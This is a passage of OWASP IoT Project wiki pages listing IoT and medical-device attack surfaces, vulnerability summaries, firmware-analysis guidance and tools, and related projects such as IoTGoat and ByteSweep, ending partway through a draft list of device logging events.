Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
